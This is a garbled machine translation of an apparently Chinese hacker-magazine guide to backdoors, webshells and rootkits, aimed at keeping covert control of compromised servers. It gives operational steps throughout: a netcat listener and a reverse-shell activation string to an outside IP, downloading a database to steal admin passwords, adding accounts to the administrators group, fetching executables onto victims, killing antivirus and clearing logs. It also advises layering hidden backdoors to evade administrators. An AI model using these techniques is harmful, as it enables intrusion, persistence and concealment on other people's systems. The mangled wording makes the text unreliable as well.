What is a back door?
The latter procedure is also known as Trojan horse, and its use is to latenate in the computer, engaged in the simultaneous information or facilitating the actions of hackers. The latter procedures and computer viruses have the biggest difference in the latter programs that do not necessarily have self-replication, that is, the backdoor program does not necessarily "infect" other computers.
The back door is a method of logging in to the system that not only bypass the system's existing security settings, but also defeats various enhanced security settings on the system.
The back door is a method of logging in to the system that not only bypass the system's existing security settings, but also defeats various enhanced security settings on the system.
The back door includes a lot of types from simple to strange. Simple back door may just create a new account, or take over a lot of accounts rarely; complex backmen (including Trojans) may bypass the system's security certification and have security access to the system. For example, when you enter a specific password, you can access the system with administrators.
The rear door can be associated with each other, and this technology is used by many hackers. For example, hackers may use a password to crack one or more account passwords, and hackers may create one or more accounts. A hacker can access this system, hackers may use some techniques or use a vulnerability of the system to increase permissions. Hackers may use some techniques or use the system's drainage lake to improve permissions. Hackers may modify the system's configuration file to reduce the system's defense performance. A Trojan can also be installed, so that the system opens a security vulnerability to facilitate hackers fully master the system.
The above is a common interpretation of "back door" on the Internet. In fact, we can use a very simple sentence to summarize it: the back door is to stay in a computer system for a particular way to control the computer system. way! - Obviously, master the back door technology is an indispensable basic skill for each network safe enthusiast! It allows you to firmly grasp the broiler, let it fly forever!
The following will be based on the work experience of online security, and explain the types and use methods and skills of the newly used in the network, I hope everyone can learn the best within the shortest time. Technology, enhance your own network security technology level!
Back door classification
The latter door can be classified in many ways, and the standard different natural classifications are different. In order to facilitate everyone to understand, we will consider the classification method of the backdoor program from technology:
1. Back door
Such latte programs are generally a normal web service on the server to construct your own connection, such as currently very popular ASP, CGI script back door, etc.
2. Thread insertion
With a service or thread of the system itself, insert the rear door program into it, the specific principle is that "hacking line" has been specifically explained, and interested friends can check. This is also the most popular backend technology.
3 expansion home
The so-called "expansion" refers to the functional improvement, which is very useful than the back door of ordinary single function. This back door itself is equivalent to a small security kit, which can achieve very many often Sanitary features, suitable for novice use ---- However, the stronger function, the individual feels that the original intention of "hidden", the specific opinion, is a preference of the use.
4.c / s back door
And a traditional Trojan program similar to the control method, using the "Cabin End / Server" control method, start the latter to control the server through a particular access method.
5.Rootkit
This requires separately, in fact, it is not too appropriate to column alone, however, rootkit has changed greatly changed the thinking angle and use concept of the latter program, you can say a good rootkit is a complete system killer! After we talk about this, we will not let everyone down!
The above is classified according to technology. Visible, just function! Intrusion legal ---- boutique back door
The above "nonsense" misses everyone to look tired? Ok, let's take a look at what is now in the back door of the network. If you want to learn the network security and want to improve your friends, you can't escape your five-way mountains!
1. The attack incident of the system vulnerability on the network is in recent time, because everyone is the easiest but the most effective way to realize the importance of network security: upgrade, all recognizes, so System vulnerabilities in the years in the years will be shorter and shorter, and from the recent trend, the limbs have gradually replaced the status of the system vulnerability, and many people began to study, but SQL injection It has also begun to become a hot spot for all major security sites. When it comes to scripts, the web is of course, it is necessary to say, now the mainstream trend of domestic invasion is to use some script vulnerability to upload the script back door, then browse the server installation and The program, find the breakthrough of improved permissions, and then get the system authority of the server. Now ASP, CGI, PHP, the general use of the top three scripts on the network brings a script back door in these three development. Let's take a way: Haiyang ASP Trojan This is a very widely circulated asp script. A script is behind, after several big reforms, launched the "Haiyang Top ASP Trojan XP Edition", "Haiyang Top ASP Trojan Red Powder Beauty Edition" and other functional, easy to use, easy to use often Foottale This security friend will not be unfamiliar. Type: Web Trojan Usage: Support ASP, Web Access Concealed Programs: ★★★★ ☆ Use Difficulty: ★ ☆☆☆ Hazard Procedure: ★★★ ☆☆ Killing Difficulty: ★★★ ☆☆ Now Server System Configuration Both relatively safe, the open system vulnerability has little opportunity, so the script is the fire. First we get a page permission of a server through some way (such as using the forum, which is not strict settings, SQL injection, get upload permission to get the ASP system, upload a specific program for the server of the known physical path), then we can pass Simple upload the ASP program or directly copy the code of Haiyang terminal, and then access this program through the web, you can easily access the information on the server, and you will take a simple leisure (because it is just a simple introduction, below The child will not be too difficult or too common, I hope everyone understands. Using LEADBBS2.77 once popular network, it is a typical ASP Forum, shields a lot of temples that can be injected in SQL, but many fool-level network administrators always like the default installation, then enable forums, we only need very much Simply entered in IE: WWW. ***. COM / BBS / DATA / LEADBBS. MDB can download the database of the forum directly, and there is no MD5 encryption! We directly find the administrator's account and password, then log in to the forum, replace the "Contact Us", "Help", etc. of the Forum to replace the ASP files such as our Haiyang terminal, and then perform the cmd command of Guest rights. Convenient upload / download will be programs, remote executors, etc., such a hidden back door is built! It is the way to get the server's SYSTEM permissions. Generally speaking, the function of the ocean is very powerful, and it is not easy to be killing (the way a friend takes place is to use a foot vulnerability to upload the webpage back door, then upload another back door to the hidden path, then pass Finally, the last door to delete the first uploaded ocean so that the storage path of the latter door can be made very deep. The ordinary administrator is very difficult to find), if the administrator feels that he may neutralize the latter door, You can use the forum backup to restore your own page system, and then cooperate with the system log, forum log, etc., and find suspicious ASP files to open a look at the ocean is very well identified, and then delete it.
The latte in terms of scripts also have both CGI and PHP two-sideware. The principle of use is almost. This will not be introduced here. In the Black Defense Forum, these three back doors are also included. You can download it myself after downloading. 2. Threads Inserts the back door First let's briefly explain what is a typical "thread insertion" back door: This back door does not have a process when running, all network operations are done in the process of other applications. That is, even if the firewall installed by the control end has the function of "Application Access", it is impossible to perform effective warnings and interception of such a back door, which makes the opponent's firewall shape! This back door is a very mainstream, which makes the protection of the person's headache, because it is more difficult to kill it, this back door itself is more powerful, is a must-have item of "huangjia travel, intrusion attack". ! This model is the BITS that promotes the shared of the Internet. Since its launch, all kinds of safety tool download gardens have been in the top of the top, and many friends have used its process. It is convenient. BITS Type: System Back Gate Usage: WIND200 / XP / 2003 Hidden Program: ★★★★ ☆ Urban Difficulty: ★★★ ☆ ☆ Harm Procedure: ★★★★ ☆ Killing Difficulty: ★★★★ ☆ Bits is actually BackgroundintelliGentTransferService Abbreviation, you can implement a typical thread insertion of another meaning unknowingly, there is a feature: the process manager can not see; there is no port, just act as a role of undercover; provide forward connection And reverse connection two functions; only for Windows 200 / XP / 2003. Using the example first we log in to the broiler with 3389, determine if you have System's permissions, copy bits.dll to the server, execute the cmd command: rundll32.exebits.dll, install, activate BIST, program
The character of this feature identifies the user, it is equivalent to your password, then uninstall: rundll32.exebits.dll, uninstall
This is the simplest use. In addition to hidden hidden, there are two major characteristics: port multiplexing and positive and reverse connections. Although many friends often hear these two nouns, do not understand them, port multiplexing is the use of the normal TCP port communication and control, such as 80, 139, etc., such a back door has a very good advantage is very hidden. You don't have to expose your visit without your own port, because the communication itself is the normal access of the system! The other is reverse connection, this is very common, and it is a classic idea in the back door, because the active side is not banned from the server, many very harmful firewalls are afraid!
The forward connection of BITS is very simple. You can refer to its readme. This way is used when the server does not have a firewall. It can be easily connected, but it is not easy to connect, but the way to have a firewall is not good, you have to use the following Back connection method:
Using NC listening locally (eg NC-L-P1234)
Use the NC to connect to the TCP port allowed by any firewall for the target host (80/139 / 445 ...)
Enter the activation command: hkfx @ dancewithdolphin [rxell]: 1.1.1.1: 2222
The CMD of the target host will appear in the NC listening port 2222, which enables the function of bypassing the firewall.
Devil5 (Devil 5)
Type: System Back Door
Use range: Win200 / XP / 2003
Constipation degree: ★★★★ ☆ Use difficult: ★★ ☆☆☆
Hazard: ★★★★ ☆
Killing difficulty: ★★★ ☆☆
Like BITS, Devil5 is also a thread plug-in latter, and Bits is different. It can be very convenient to customize port and need to be inserted in the GUI interface, which is suitable for use, and it is suitable for use. Since it is a custom insertion thread, it is more difficult to kill, let's take a look at its use.
Use example:
Ethics uses its own configuration program EditDevil5.exe to regularly configure the backdoor, including control port, insertion thread, connection password, time interval, etc., the key points of the interval are customized, generally set to SVCHOST, which is included in the system. Then run the back door to control it.
We connect with Telnet, the format of the connection is: Telnet *** customized port, which is different from other backdoor lies in the interface without prompting, each execution program is also separated, must have a password each time For example, we lose the server and tube account, you can activate the guest to the administrator privilege, remember to add "> password" after each execution command: NetLocalGroupAdministratorsguest / add> HKFX, then you can control The server is.
Very clear, DEVIL5 has some defects compared to the BITS of the GEO: You can't bring your order to your port communication, you need to enter your password every time you enter your password and you don't return to display the input content. It is easy to make mistakes. However, it has its own advantages: inserting threads can be customized, such as setting IE threads is more difficult to kill: you provide special killing tool Deldevil5.exe to help protect the protection system; and it You can change your name and binding, the use of flexibility is strong than BITS ... Everyone chooses how you can see your preference.
In addition, PORTLESSBACKDOOR and other tools are also such lattices, powerful, hidden hidden, and everyone is interested in studying.
3. Expand the back door
The so-called expansion latte, in a normal sense, it can be seen as a lot of functions into the back door, allowing the back door to achieve a lot of functions, convenient to directly control broilers or servers, such back door is very popular among beginners Love, usually integrated file upload / download, system user detection, HTTP access, terminal installation, port open, start / stop service, etc., itself is a small toolkit, powerful.
Wineggdroupshell
Type: System Back Door
Use range: Win2000 / XP / 2003
Constipation: ★★★★ ☆
Difficulty in use: ★★ ☆☆☆
Hazard: ★★★★ ☆
Killing difficulty: ★★★★ ☆
This latte is a representative of the extended back door. The function is comprehensive to lane, it can achieve the following features: process management, can view, kill processes (support process name or PID to kill process); Registration form (view, delete, increase, etc.); service management (stop, start, enumeration, configuration, delete service) port to program association function (FPORT); system restart, custom power, logout and other functions ( Reboot, Poweroff, ShutDown, Logoff; sniffing password function; install the terminal, modify the terminal port function; port redirection function (multi-thread, and limit the connector IP); HTTP service function (multi-thread, and restriction connector IP); SOCD5 agent function (support two different ways to verify, limit connectivity IP); cloned account, detection clone account function (Clonclone); strengthened Findpassword function (all login users, including using cloning accounts Remote login user password); HTTP agent (completely anonymous, support OICQ, MSN, MIRC and other programs); other auxiliary functions, http download, delete log, system information, recovery commonly associated, enumeration system account, etc. When the network is just launched on the back door, a lot of people use it to replace their original rear door, praise the sound of the sounds, but most of the voice of some ordinary salvage, in fact it and "back door" The original definition is entitled: Once you need to implement the functions, your program needs to consider a lot of problems in execution, hide, stability, etc., a negligence will lead to a full failure, so it is not recommended There is a place where the door needs to be very hidden.
Use example
In front of the latter door, you need to use the EditServer.exe program that it comes into the server, from 10 specific configurations, including insertion threads, passwords, IP login mail announcements, etc., it is not difficult to see it. The function is very powerful, the concearation is also very strong, and the following is a few functions commonly used in the invasion. I believe that friends who often play in invading will certainly find its power:
Fport: Lists the list of processes to ports to discover the ports corresponding to the running program in the system, which can be used to detect common hidden backsports.
Reboot: Restart the system, if you upload and run other back-door programs, and need to restart the machine to make the back door work properly, then use this command!
Shell: Get a dosshell, this doesn't speak much, get the cmdshell on the server or broiler.
PskillPid or program name: Used to kill specific services, such as anti-virus software or firewalls.
Execute program: Execute procedures in the background, such as Sniffer, etc.
HTTP: // IP / File Name Save File Name: Download the program, directly from the DOWN a back door to the server.
InstallTERM port: Install terminal service in the system without the Win2K service version of the terminal service, restart the system to take effect, and can customize the connection port, such as using other ports without 3389.
StopService / StartService: Stop or start a system service, such as Telnet. Cleanevent: Delete the system log.
Redirect: TCP data forwarding, this feature is a very good feature in the back door program, which can be sent to control the internal network through the data of a certain port, which is very tube when infiltrating!
EnumService: Enumeral all automatically started the information, such as the back door, Trojan.
Regedit: Enter the registry mode, the user familiar with the registry finally found the gospel in the back door!
FINDPASSWORD: Get all login user passwords, which is much better than our usual Findpass features.
......
Overall,
Wineggdropshell is a very colorful in the back door. It has been stable and functional, and the function is so powerful, but it is difficult to avoid because it is too powerful, it is difficult to kill and suspect it is difficult to avoid. So many people are using
After a period of time, Wineggdropshell was found, it was very normal. I didn't have to discouze, and I used very simple way to improve its concealment, which will be explained below.
Relative to
Wineggdropshell For WINEGGDROPSHELL, Winshell, who is solitary, is not so comprehensive, but the author recommends more newers more using Winshell instead of
Wineggdropshell, because Winshell features only get a shell
Both WINSHELL and WOLF are the domestic early top latte programs. The programming is undoubtedly very classic. When newbie is studying, it will make you understand a lot of system related things, understanding a lot of intrusion ideas and methods.
C / S back door Traditional Trojan often uses a C / S architecture, so that the architecture is convenient to control, and it is also possible to avoid the situation of "universal password", which has a certain contribution to the latter privatization, this is classified comparison Blur, many back door can be attributed to this class, such as more clever is ICMPDOOR ICMPDOOR type: system latte use range: Win2000 / XP / 2003 hidden degree: ★★★★★ Usage: ★★★ ☆☆ Hazard: ★★★ ☆ ☆ Hazard level ★★★★ ☆ Killing difficulty: ★★★★★ This back door uses the ICMP channel to communicate, so do not open any port, just use the system itself to control the system service, boot automatically, can penetrate Many firewalls - clearly see how the biggest feature: do not open any port ~ only through ICMP control! Compared with any of the back door programs, its control method is very special. Even the 80 port does not have to be opened, and you have to prepare the service procedures unique thinking angle and vision! Application examples This back door is actually used in the most useful place to break through the control of the intranet computer after breaking through the gateway, because many confidential data is placed on the intranet computer, and the internal network computer is not the commercial network we think. Detection, its network is not as easy to invade and control as our common intranet, because the company itself involves some network security services, so the protection of the intranet personal computer is in place, and trying a lot of back door After that, ICMPDOOR helped me achieve successful infiltration inner network! This author started falling to this back door. First use the icmpsrv.exe-install parameters for the back door installation, then use ICMPsend.exeip to control, you can use: [http://xx.xxx.xxx/admin.exep;-hkfx.exe] mode download file, save it In // System32 / Directory, the file name is hkfx.exe, the program is "-" can't save, using [pslist] can also list the process name and PID of the remote host, and then use [pskillid] to kill the process. , In the same way, enter the normal CMD command, the remote host also executes the relevant command. This back door is the C / S architecture, you must use ICMPsend to activate the server, but he also has its own innate shortcomings: the back door relies on ICMP to communicate, now the network, after the baptism of the shock wave, very few servers also accept the ICMP package. Many of them have blocked it, so use it to control the server is not a good way, this is why I use it to control the internal network computer - ICMP Package? ! 5.Rootkit If there is a thousand autumn, the above-mentioned latte programs have each other, and they and classic rootkit are more than a little witch, which is rootkit? Rootkit appeared in the early 1990s, in February 1994, the noun was first used in the safety consultation report. From now on, Rootkit's technology has developed very rapidly, and the application is getting wider and more difficult. Among them, ruthenium has the most rootkit for both SunOS and Linux operating system. Many people have a misunderstanding that rootkit is a tool for obtaining system root access. In fact, rootkit is an attack used to conceal your own trace and reserve root access tools.
Typically, an attacker obtains root access via a remote attack. After entering the system, the attacker will install rootkit in the invasive host, and then he will often log in with other users through the ROOTKIT, if only yourself, attacker Just start the information about the log of the log. After obtaining the user and password of the Rootkit, the attacker will use this information to invade other systems. Rootkit migrated from * NIX system to the Windows system completely followed these "terrible" features! Now the common rootkit on the network is the kernel back door software, and the user can hide files, processes, system services, system drivers, registry keys, and key values, open ports, and fictional available disks. The program also disguised it in memory, and stealthly controls the hidden process. The program is installed hidden back door, registered hidden system services and install the system driver. The back door technology allows implanting Redirector, a very difficult to kill a stuff, so many online managers are very headache! HACKERDEFENDER Type: System Back Gate Usage: Win200 / XP / 2003 Hidden Level: ★★★★★ Urban Difficulty: ★★★★★ The level of harm: ★★★★★ Killing difficulty: ★★★★★ (huh, all Five stars, because it is too "overbearing") Now the latest version of the HXDF is 1.0.0, it is a program passed from abroad, including two key programs, the configuration file INI is very complicated, believe that novice use is also very difficult Mainly include: [HiddenSers], [HiddenRegKeys], [HiddenRegKeys], [HiddenRegKeys], [hiddenregvalues], [STARTUPRUN], [FREESPORTS], [HIDDENPORTS], [SETTINPORTS], [Settings]. The function is to hide the file (directory), hide the process, hidden service, hide the registration key, hide the registry key value, startup program, increase disk remaining space, hide port, back door settings, specific configurations, we do not specifically explain, this issue The article has a detailed introduction, we talk about its characteristics (pure personal opinions and experience, please Haihan): (1) You can realize the communication of normal system TCP ports, such as 80, etc., this feature is not fresh in advanced see. (2) You can get a simple system shell, which is enough for the invaded veterans, and excess functions are cumbersome. (3) Hide port, if you have to use a very unconventional port communication of TCP, use this feature, rest assured, others can't find it. (4) All things that hide the back door! This can only be described in one word: cow! For example, hidden files, services, registration tables, etc. (5) The most classic back door thinking in history: with other expansion lattime use, the effect is good for your expectation! (This is the later content, we will talk about it immediately).
Throw other things out, install such rootkit in the system, you can't detect this program through the ordinary killing pathway, this program is worth this! Imagine: A back door running on your server, you can't see it, don't say killing! Note: Because after the end is too harm, the editor's special one will roll off the author, like to study the friend of the latter program can go to research, but don't pay attention to not running the program, killing and removing it is very troublesome. ! Reinstall the system directly! Classic back door thinking now, many friends are trying to develop some back door programs, they try to add a lot of functions to the back door, I can't wait for a back door, it is an operating system! ---- It is very obvious, this is wrong! Because a good back door can achieve a very single function, it is not to control the server, but give you to control the server again when you lose the server control method! So, don't use the latter procedures, of course, don't let your back door programs are too. There is a problem with all network security tools: hidden! Now with the improvement of netizens safety awareness, anti-virus software, system security programs these things are no longer "treasures", so even if your back door program can achieve 20,000 functions, it is easy to kill by anti-virus software. It is also white! In other words: If others can easily look at the process, check the registry, see if there is a problem with the port, you will not be good! So remember: hidden is the most important! Many friends like to use a very powerful back door program to control the server. Although it is hidden, once he is killed, then he only looks at the service and crying. In fact, we can solve this problem with we will solve this problem: embedded Set of complementary back door programs! Once a latter is exposed, another back door or several back doors are still in the server - this is very simple, involving many intrusion experiences and methods, also involved in rootkit, and we will talk about it later. For the current network, if a network security tool is published, then this program will be transmitted to the network in a very short time! Obviously, the survival of the program is very short, can't be killed in a few days, so all the programs listed in this article can be found on the Internet (there are also included on the CD), just provide a better ideas for everyone. And introduce, many back doors are private. I hope that everyone can write their own outstanding backsheet through their own learning! Through the above explanation, I believe that everyone has a fact that the mainstream latte programs have a fact that the degree of understanding, this article can not be used to pick up an actual decision method and killing, I believe that readers are also bored, After the editorial review, I can't publish it. The specific use method has to rely on everyone to explore. Let's talk about several individuals in the classic back door.
First patted the WTF's hard: this kid last in the Black Defense Defense Laboratory said: "Brothers don't stick to the style of thinking, I know that safety is the most important thing is to exercise and conscious thinking. Cultivate, in order to exercise everyone's thinking ability, friendship remind everyone, we have a lot of traps in the level! Don't be confused by the phenomenon! "Don't read this sentence, put this sentence to the network In the inclusion and attack, many thinking were diverged, it is an improvement in the overall level! Take our back door, which is the same, the above functions, hidden backsheet, why are you put on broiler, can't be killed three days? And someone else is ready to use it? Among them, this is actually the embodiment of the importance of thinking conversion. Here we specifically talk about how the latte programs can do good thinking conversion and characteristics, first to see the misunderstanding of ordinary netizens: (1) ordinary safe enthusiasts can Through the common system vulnerability or other route invades the server, then the new one account is new, directly add to the administrator privilege, and a little conscious can also add one $ adding to the account to make others can't discover, and then by 3389, 23 Control server, sweat! This is what you look at the "hacking line" results? "Hacking line" teaches you this? Is all administrators? Don't know the most important account of the system? Such broilers are not lost within 1 day! (2) Control Server -> Upload Back Door_> Open Specific Port -> Using the Back Gate Control Server, this intermediate through the classic tools such as FINDPASS to get the administrator's password, open 3389 to the server ... Same as a friend One word: dizzy! A simple NetStat-AN that can no longer make your connection exposure! That will wait for the court! (3) Clone the system's built-in account and use it to log in to the server, which is also an inequent method. According to my experience, such broilers are definitely not long! One or two sides will fly away! .......... The above is just a relatively low-end mistake. I believe that everyone will not make such a mistake after reading this article. Let's talk about the more secure invasion to control the meat chicken. If I speak today There are two things, and three sentences can keep you remember in the future invasion and safety protection, then I am gratifying! During ordinary intrusion, 3389 of course is the favorite way of control, why only use 3389 to simply control service Lu? How do you control when others turn off 3389? So need the back door, then install the ordinary classic back door, why is my broiler flying in a short time? - Please note: Any system administrator is not idiot! No matter how many "black", your remote control server does not have physical contact with others! I can't force it to unplug the network cable, format the hard drive to always make you can't control it? ! Therefore, the hiddenness of the latter door is very important, let the administrator can't find that there is a back door in the system! A good back door, you can achieve a single function, you must do not often use your back door program to control broilers so you don't fly, better ways are: 3389/23 extended back door rootkit this It is the most classic back door matching method so far. It is also easy to see: When the other party finds unknown IP connection, it will definitely check the system problem, change the system password, and clean up the account is inevitable.
